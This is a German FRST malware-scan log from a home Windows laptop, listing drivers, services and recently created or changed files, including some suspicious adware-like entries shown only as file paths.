S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [5139968 2012-06-02] (Broadcom Corporation)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-07-31] (Qualcomm Atheros)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [72128 2014-06-20] (McAfee, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3295984 2012-07-26] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [181704 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [313544 2014-06-20] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [70600 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [523792 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [786296 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [445512 2014-08-20] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [96592 2014-08-20] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37448 2015-12-29] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [348552 2014-06-20] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-09-11] (Dritek System Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34216 2012-07-26] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258288 2012-07-26] (Microsoft Corporation)
S3 IntcAzAudAddService; \SystemRoot\system32\drivers\RTKVHD64.sys [X]
S3 sdfhgdf; system32\DRIVERS\sdfhgdf.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-02-08 00:21 - 2016-02-08 00:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-02-08 00:11 - 2016-02-07 23:50 - 00024064 _____ C:\WINDOWS\zoek-delete.exe
2016-02-07 23:50 - 2016-02-08 00:07 - 00000000 ____D C:\zoek_backup
2016-02-07 22:53 - 2016-02-08 00:21 - 00001066 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2016-02-07 22:53 - 2016-02-07 22:54 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-07 22:53 - 2016-02-07 22:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware
2016-02-07 22:53 - 2016-02-07 22:53 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-07 22:53 - 2016-02-07 22:53 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware
2016-02-07 22:53 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-07 22:53 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-07 22:53 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-07 22:27 - 2016-02-07 22:36 - 00000000 ____D C:\AdwCleaner
2016-02-07 20:27 - 2016-02-07 20:27 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-02-07 20:27 - 2016-02-07 20:27 - 00000000 ____D C:\WINDOWS\system32\NV
2016-02-07 19:57 - 2016-02-07 21:21 - 00000000 ____D C:\Users\UpdatusUser
2016-02-07 19:57 - 2016-02-07 20:27 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-07 19:57 - 2016-02-07 19:57 - 00000020 ___SH C:\Users\UpdatusUser\ntuser.ini
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Vorlagen
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Startmenü
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Netzwerkumgebung
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Lokale Einstellungen
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Eigene Dateien
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Druckumgebung
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Documents\Eigene Videos
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Documents\Eigene Musik
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Documents\Eigene Bilder
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\AppData\Local\Verlauf
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\AppData\Local\Anwendungsdaten
2016-02-07 19:57 - 2016-02-07 19:57 - 00000000 _SHDL C:\Users\UpdatusUser\Anwendungsdaten
2016-02-07 19:56 - 2014-10-30 08:20 - 01890816 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2016-02-07 19:56 - 2014-10-30 06:22 - 01569792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2016-02-07 19:56 - 2012-10-02 20:51 - 06200680 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2016-02-07 19:56 - 2012-10-02 20:51 - 03536817 _____ C:\WINDOWS\system32\nvcoproc.bin
2016-02-07 19:56 - 2012-10-02 20:51 - 03293544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2016-02-07 19:56 - 2012-10-02 20:50 - 02557800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2016-02-07 19:56 - 2012-10-02 20:50 - 00891240 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvvsvc.exe
2016-02-07 19:56 - 2012-10-02 20:50 - 00866664 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2016-02-07 19:56 - 2012-10-02 20:50 - 00118120 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2016-02-07 19:56 - 2012-10-02 20:50 - 00063336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2016-02-07 19:56 - 2012-10-02 20:50 - 00055144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2016-02-07 19:54 - 2016-02-07 19:54 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-02-07 19:53 - 2016-02-07 19:57 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-02-07 19:25 - 2013-09-23 13:49 - 00197704 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys
2016-02-06 19:06 - 2016-02-06 19:06 - 00000000 ____D C:\Users\Manz\AppData\Roaming\GeniusCache
2016-02-06 18:47 - 2016-02-08 00:27 - 00000000 ____D C:\FRST
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50609.txt
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50562.txt
2016-02-01 19:43 - 2016-02-01 19:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-49546.txt
2016-02-01 19:42 - 2016-02-01 19:42 - 00000000 ____D C:\WINDOWS\system32\ege
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GMX MailCheck
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\Program Files\GMX MailCheck
2016-02-01 19:33 - 2016-02-01 19:33 - 00000000 ____D C:\Program Files (x86)\GMX MailCheck
2016-02-01 18:58 - 2016-02-01 18:58 - 00000000 ____D C:\Users\Manz\AppData\Local\Tempfolder
2016-02-01 18:57 - 2016-02-01 18:57 - 00003334 _____ C:\WINDOWS\System32\Tasks\Awiikjuw
2016-02-01 18:43 - 2016-02-01 18:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-50265.txt
2016-01-31 21:46 - 2016-01-31 21:46 - 00000117 _____ C:\WINDOWS\system32\netcfg-3146031.txt
2016-01-31 21:42 - 2016-01-31 21:42 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium
2016-01-31 21:42 - 2016-01-31 21:42 - 00000000 ____D C:\Users\Manz\AppData\Local\Chromium
2016-01-31 21:39 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Roaming\AVG
2016-01-31 21:37 - 2016-02-08 00:14 - 00000000 ____D C:\Users\Manz\AppData\Local\ObscenelyAd
2016-01-31 21:29 - 2016-02-01 19:17 - 00000000 ____D C:\Program Files (x86)\AVG
2016-01-31 21:27 - 2016-01-31 21:27 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Opera Software
2016-01-31 21:27 - 2016-01-31 21:27 - 00000000 ____D C:\Users\Manz\AppData\Local\Opera Software
2016-01-31 21:23 - 2016-02-01 19:19 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-31 21:22 - 2016-01-31 21:23 - 00000000 ____D C:\Program Files (x86)\1und1Softwareaktualisierung
2016-01-31 21:22 - 2016-01-31 21:22 - 00003862 _____ C:\WINDOWS\System32\Tasks\Registration 1und1 Task
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\Users\Manz\AppData\LocalLow\1&1 Mail & Media GmbH
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\ProgramData\UUdb
2016-01-31 21:22 - 2016-01-31 21:22 - 00000000 ____D C:\ProgramData\1&1 Mail & Media GmbH
2016-01-31 21:12 - 2016-02-08 00:22 - 00001173 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2016-01-31 21:12 - 2016-02-08 00:21 - 00001161 _____ C:\Users\Public\Desktop\Mozilla Thunderbird.lnk
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Users\Manz\AppData\Local\Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2016-01-31 21:12 - 2016-01-31 21:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-31 21:00 - 2016-01-31 21:00 - 00000117 _____ C:\WINDOWS\system32\netcfg-361281.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000323 _____ C:\WINDOWS\system32\netcfg-349968.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-347609.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-344468.txt
2016-01-31 20:59 - 2016-01-31 20:59 - 00000117 _____ C:\WINDOWS\system32\netcfg-334234.txt
2016-01-31 20:57 - 2016-02-07 23:52 - 00000000 ____D C:\Users\Manz\AppData\Local\CrashDumps
2016-01-31 20:54 - 2016-01-31 20:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-41625.txt
2016-01-31 20:53 - 2016-01-31 20:53 - 00000117 _____ C:\WINDOWS\system32\netcfg-1946671.txt
2016-01-31 20:22 - 2016-01-31 20:22 - 00000117 _____ C:\WINDOWS\system32\netcfg-41890.txt
2016-01-31 20:20 - 2016-01-31 20:20 - 00000117 _____ C:\WINDOWS\system32\netcfg-809703.txt
2016-01-31 20:19 - 2012-08-10 09:40 - 02213776 _____ (ELAN Microelectronics Corp.) C:\WINDOWS\ETDUninst.dll
2016-01-31 19:01 - 2016-01-31 19:01 - 00000117 _____ C:\WINDOWS\system32\netcfg-13944156.txt
2016-01-31 19:01 - 2016-01-31 19:01 - 00000117 _____ C:\WINDOWS\system32\netcfg-13941265.txt
2016-01-31 18:50 - 2016-01-31 18:50 - 00000117 _____ C:\WINDOWS\system32\netcfg-13267328.txt
2016-01-31 18:50 - 2016-01-31 18:50 - 00000117 _____ C:\WINDOWS\system32\netcfg-13251421.txt
2016-01-31 15:05 - 2016-01-31 15:05 - 00000092 _____ C:\WINDOWS\system32\netcfg-16197750.txt
2016-01-31 14:50 - 2016-01-31 14:50 - 00000000 ____D C:\ProgramData\Brother
2016-01-31 14:43 - 2016-01-31 14:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-14853765.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-14536734.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-14533984.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000000 ____D C:\ProgramData\b66d00b7-58c3-0
2016-01-31 14:38 - 2016-01-31 14:38 - 00000000 ____D C:\ProgramData\b66d00b7-3853-1
2016-01-31 14:36 - 2016-01-31 14:36 - 00000117 _____ C:\WINDOWS\system32\netcfg-14466015.txt
2016-01-31 14:35 - 2016-01-31 14:35 - 00000117 _____ C:\WINDOWS\system32\netcfg-14391046.txt
2016-01-31 14:34 - 2016-01-31 14:35 - 00000117 _____ C:\WINDOWS\system32\netcfg-14348812.txt
2016-01-31 14:34 - 2016-01-31 14:34 - 00001139 _____ C:\WINDOWS\system32\netcfg-14346250.txt
2016-01-31 14:19 - 2016-01-31 14:24 - 01080312 _____ (Mozilla) C:\Users\Manz\Downloads\Thunderbird Setup 38.5.1(1).exe.part
2016-01-31 14:13 - 2016-02-01 19:17 - 00000000 ____D C:\ProgramData\Avg
2016-01-31 14:12 - 2016-01-31 14:12 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-01-31 14:09 - 2016-01-31 14:18 - 33940552 _____ (Mozilla) C:\Users\Manz\Downloads\Thunderbird Setup 38.5.1.exe
2016-01-31 14:08 - 2016-02-01 19:00 - 00000000 ____D C:\Users\Manz\AppData\Local\AvgSetupLog
2016-01-31 14:08 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Local\Avg
2016-01-31 14:06 - 2016-01-31 14:03 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-31 14:04 - 2016-02-08 00:22 - 00001656 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-31 14:04 - 2016-01-31 20:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-31 14:04 - 2016-01-31 14:11 - 00000000 ____D C:\Users\Manz\AppData\Local\Mozilla
2016-01-31 14:04 - 2016-01-31 14:05 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Mozilla
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\ProgramData\8da658ec-7697-0
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\ProgramData\8da658ec-0995-1
2016-01-31 13:59 - 2016-02-08 00:07 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2016-01-31 13:59 - 2016-01-31 18:49 - 00002912 _____ C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
2016-01-31 13:59 - 2016-01-31 18:49 - 00002912 _____ C:\WINDOWS\system32\LavasoftTcpServiceOff.ini
2016-01-31 13:59 - 2016-01-31 13:59 - 00425744 _____ (Lavasoft Limited) C:\WINDOWS\system32\LavasoftTcpService64.dll
2016-01-31 13:57 - 2016-02-08 00:07 - 00000000 ____D C:\ProgramData\Lavasoft
2016-01-31 13:57 - 2016-01-31 13:57 - 00000000 ____D C:\Users\Manz\AppData\Local\clear.fi
2016-01-31 13:54 - 2016-01-31 20:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\WildTangent
2016-01-31 13:44 - 2016-01-31 13:44 - 00000000 ____D C:\Users\Manz\AppData\Local\EgisTec IPS
2016-01-31 13:43 - 2016-02-07 22:56 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2229505580-413648313-3343944023-1002
2016-01-31 13:40 - 2014-05-20 03:33 - 00059416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-01-31 13:40 - 2014-05-20 00:45 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-01-31 13:40 - 2014-05-20 00:45 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 03286528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 01623040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-01-31 13:40 - 2014-05-14 23:43 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-01-31 13:40 - 2014-05-14 23:43 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-01-31 13:40 - 2014-05-14 23:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-01-31 13:40 - 2014-05-14 23:42 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-01-31 13:40 - 2013-08-16 06:21 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-01-31 13:40 - 2013-08-16 06:21 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-01-31 13:40 - 2013-08-15 23:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2016-01-31 13:40 - 2012-11-06 05:20 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2016-01-31 13:40 - 2012-11-06 05:00 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wushareduxresources.dll
2016-01-31 13:38 - 2016-01-31 13:38 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Macromedia
2016-01-31 13:36 - 2016-02-08 00:21 - 00001442 _____ C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Atheros
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Adobe
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Program Files\Preload
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Program Files\Accessory Store
2016-01-31 13:34 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Local\Packages
2016-01-31 13:34 - 2016-01-31 13:34 - 00000117 _____ C:\WINDOWS\system32\netcfg-10714812.txt
2016-01-31 13:34 - 2016-01-31 13:34 - 00000117 _____ C:\WINDOWS\system32\netcfg-10714468.txt
2016-01-31 13:34 - 2016-01-31 13:34 - 00000020 ___SH C:\Users\Manz\ntuser.ini
2016-01-31 12:06 - 2016-01-31 12:06 - 00000117 _____ C:\WINDOWS\system32\netcfg-5452000.txt
2016-01-31 12:06 - 2016-01-31 12:06 - 00000117 _____ C:\WINDOWS\system32\netcfg-5449984.txt
2016-01-31 11:54 - 2016-01-31 11:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-4734765.txt
2016-01-31 11:54 - 2016-01-31 11:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-4734703.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-177156.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-176171.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-173796.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Vorlagen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Startmenü
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Dokumente
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Program Files\Gemeinsame Dateien
2016-01-31 10:37 - 2016-02-08 00:07 - 00000000 ____D C:\Users\Manz
2016-01-31 10:37 - 2016-01-31 10:38 - 00024768 _____ C:\WINDOWS\diagwrn.xml
2016-01-31 10:37 - 2016-01-31 10:38 - 00024768 _____ C:\WINDOWS\diagerr.xml
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Vorlagen
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Startmenü
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Netzwerkumgebung
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Lokale Einstellungen
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Eigene Dateien
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Druckumgebung
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Videos
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Musik
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Bilder
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Local\Verlauf
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Local\Anwendungsdaten
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Anwendungsdaten
2016-01-31 10:36 - 2016-01-31 10:36 - 00000117 _____ C:\WINDOWS\system32\netcfg-73703.txt
2016-01-31 10:35 - 2016-02-07 20:54 - 00000000 ____D C:\Windows.old
2016-01-31 10:34 - 2016-01-31 10:34 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2016-01-31 10:10 - 2016-01-31 10:10 - 00000000 ____D C:\$WINDOWS.~BT
2016-01-31 10:07 - 2016-02-07 20:53 - 00000000 ___HD C:\$SysReset
2016-01-20 14:27 - 2016-01-20 14:27 - 00001379 _____ C:\Users\Manz\Downloads\URLLink(16).acsm
2016-01-18 17:14 - 2016-01-18 17:14 - 00012193 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben (Sport).odt
2016-01-18 17:00 - 2016-01-18 17:00 - 00021980 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben Sport..pdf
2016-01-18 16:58 - 2016-01-18 16:58 - 00021979 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben Sport.pdf
2016-01-18 16:44 - 2016-01-18 16:48 - 00022587 _____ C:\Users\Manz\Documents\ANGST IST ZUM ÜBERWINDEN DA..odt
2016-01-18 15:53 - 2016-01-18 15:54 - 00020797 _____ C:\Users\Manz\Documents\NICHT JEDER KANN IN ALLEM GUT SEIN.odt
2016-01-10 15:44 - 2016-01-10 15:44 - 00001503 _____ C:\Users\Manz\Downloads\URLLink(15).acsm
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-02-08 00:25 - 2012-07-26 08:22 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-08 00:22 - 2012-09-11 13:24 - 00002435 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
2016-02-08 00:22 - 2012-08-03 03:32 - 00001685 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
2016-02-08 00:22 - 2012-08-03 03:32 - 00001667 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
2016-02-08 00:21 - 2015-10-30 14:37 - 00001827 _____ C:\Users\Manz\Desktop\Brother DCP-195C - Verknüpfung.lnk
2016-02-08 00:21 - 2012-09-11 13:39 - 00001245 _____ C:\Users\Public\Desktop\Help and Support.lnk
2016-02-08 00:21 - 2012-08-03 03:29 - 00001766 _____ C:\Users\Public\Desktop\McAfee Internet Security Suite.lnk
2016-02-08 00:21 - 2012-08-03 03:28 - 00002123 _____ C:\Users\Public\Desktop\Acer Backup Manager.lnk
2016-02-08 00:14 - 2012-07-26 06:26 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-08 00:13 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-07 22:36 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-02-07 21:22 - 2012-07-26 06:26 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2016-02-07 21:18 - 2012-08-03 03:28 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-02-07 20:29 - 2012-08-03 03:28 - 00000000 ____D C:\ProgramData\McAfee
2016-02-07 20:29 - 2012-08-03 03:28 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-02-07 19:57 - 2012-09-11 12:52 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-02-07 19:56 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\Help
2016-02-07 19:53 - 2012-07-26 06:37 - 00000000 ____D C:\WINDOWS\Inf
2016-02-07 19:23 - 2012-07-26 09:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-02-06 18:47 - 2012-09-11 22:36 - 00753134 _____ C:\WINDOWS\system32\perfh007.dat
2016-02-06 18:47 - 2012-09-11 22:36 - 00155826 _____ C:\WINDOWS\system32\perfc007.dat
2016-02-06 18:47 - 2012-07-26 08:28 - 01745416 _____ C:\WINDOWS\system32\PerfStringBackup.INI
